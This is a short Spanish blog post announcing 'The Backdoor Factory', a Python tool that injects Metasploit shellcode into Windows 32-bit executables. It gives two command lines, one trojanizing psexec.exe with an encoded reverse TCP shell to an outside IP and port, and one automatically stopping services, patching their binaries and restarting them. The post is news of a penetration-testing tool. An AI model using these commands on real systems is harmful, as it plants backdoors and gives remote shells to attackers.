The Backdoor Factory: script en Python para "backdoorizar" Win32 PE

Joshua Pitts de Nova Hackers ha publicado 'The Backdoor Factory', un interesante script en Python para "backdoorizar" ejecutables y librerías de Windows (Win32 PE). Básicamente mapea la cabecera (PE Header), inserta un trozo de código con el shellcode (de Metasploit) y parchea el binario.

De momento funciona sólo para 32 bits y, por ejemplo, funciona con todas las herramientas de Sysinternals:

./backdoor.py -f psexec.exe -i 192.168.0.100 -p 8080 -s reverse_shell_tcp -e xor_encode

Además incluye el módulo injector que busca automáticamente los ejecutables "backdoorizables" en disco y además comprueba si existe un proceso o servicio asociado y, en caso afirmativo, lo para, parchea el ejecutable y lo vuelve a iniciar. Previamente hay que editar el diccionario "list_of_targets".

./backdoor.py -j -i 192.168.0.100 -p 8080 -s reverse_shell_tcp -a -u .moocowwow

Comentarios